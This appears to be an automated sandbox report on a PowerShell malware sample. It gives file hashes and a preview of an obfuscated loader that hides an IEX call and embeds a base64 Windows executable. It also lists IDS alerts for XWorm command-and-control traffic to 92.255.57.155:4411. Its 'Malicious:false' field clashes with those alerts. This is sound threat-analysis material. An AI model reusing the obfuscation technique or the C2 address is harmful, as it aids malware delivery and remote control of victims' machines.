                              SHA-512:C5A533EE4A775BA35E14E62D9DC8AAFCF850DF6596E31F9E9413AF0B16DC1A07D6FA1F0118AFB8F3C5E9208E62FDC64F0C718FDF6BEB3CD7FB32D3EB372D80A2
                              Malicious:false
                              File type:ASCII text, with very long lines (65463), with CRLF line terminators
                              Entropy (8bit):5.1590106021952575
                              TrID:
                                File name:QP2uO3eN2p.ps1
                                File size:341'153 bytes
                                MD5:6d71ada719b48d770647e3e703cbbcfd
                                SHA1:bc2dd183895888c20057f165d3332e8ecf6a6ada
                                SHA256:7dc08327ae721c3ecf12447901858457bf510dd7016838839a629f86d673b18b
                                SHA512:66d6563dc7e30d3f0a753e1e3b7368914ae03a671824d02ac345ccd648451c80e52b0bfb5d7d42fdd023d59aac1ec718507568ef39cead9a5ec78e1d844d74c2
                                SSDEEP:6144:3K4rMAa8DAz7OGxuerPkwn4Je1Z0e9JCrSKQ81J7lHH7urZyrnpGYPoHdolDeZl7:yfyNcJrk6TKy
                                TLSH:81743C318805B92F8EEF1F87B5402FD37C78217BDF551018A88F16B96A68238597AF74
                                File Content Preview:ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE
                                Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T08:15:42.786507+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:43.333388+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:15:43.392540+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:57.158905+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:15:57.163921+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:58.442835+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:15:58.442835+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:11.015125+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:11.017028+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:24.874899+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:24.877591+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:28.597087+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:30.404357+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:30.407637+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:31.044515+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:31.046398+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:31.686005+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:31.717077+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:32.036316+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:32.038280+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:32.322472+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
2024-12-18T08:16:32.324560+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:33.044858+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
                                2024-12-18T08:16:33.046685+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:33.647092+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:33.649040+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:33.838111+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:34.256991+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:34.258520+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:34.448063+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:34.498083+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:34.865787+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:34.871488+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:35.056779+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:35.059297+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:35.657782+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:35.848677+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:35.968423+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:35.968475+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:36.081371+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.159529+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.204297+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:36.456221+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.486225+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:36.578467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.647151+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:36.767180+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.888806+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.057913+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:37.064619+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.177709+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:37.202971+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.428366+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.726486+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.728261+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:37.960367+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.972727+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.039017+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.092863+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.404743+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.457944+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.648316+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.650360+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.839427+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.841832+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.961338+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.965834+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:39.278761+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:39.607222+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:39.637499+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:39.846527+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:39.856187+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:40.756259+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:40.757913+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:40.947965+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:40.949831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:41.671236+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:41.673227+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:41.938130+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:41.939616+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:42.275763+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:42.342737+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:42.413501+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:42.462930+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:42.604480+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:42.629844+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:42.773737+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:42.817854+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:43.873445+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:44.064574+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:44.157275+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:44.571175+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:44.733309+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:46.591890+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:46.593476+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:47.498676+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:47.500355+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:48.112016+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:48.169267+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:48.303350+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:48.305446+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:48.360230+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:48.474790+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:48.493884+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:48.595877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:49.669827+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:49.716014+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:49.860846+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.026813+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.051921+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.051995+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:50.325197+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.327274+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:50.521845+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:50.638151+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.761244+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:51.119723+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:51.121851+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:51.761498+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:51.944455+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.063076+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.445896+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.448689+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:52.504580+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.609713+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:52.624346+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.729516+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:52.759401+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:53.137497+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:53.137643+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:53.169297+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:53.835046+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:53.851286+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.049025+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.074535+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.265643+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.288794+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.360679+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.409288+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.480016+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.529084+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.670898+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.787278+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.787487+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.949423+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:56.216871+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:56.231810+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:56.408744+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:56.411401+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:56.645108+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:56.646506+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:58.870137+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.061121+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.065875+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:59.252049+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.325992+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:59.668999+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.669934+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:59.958951+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.959987+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:00.273669+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:00.274717+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:01.670112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:01.861176+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:01.953980+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:02.390921+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
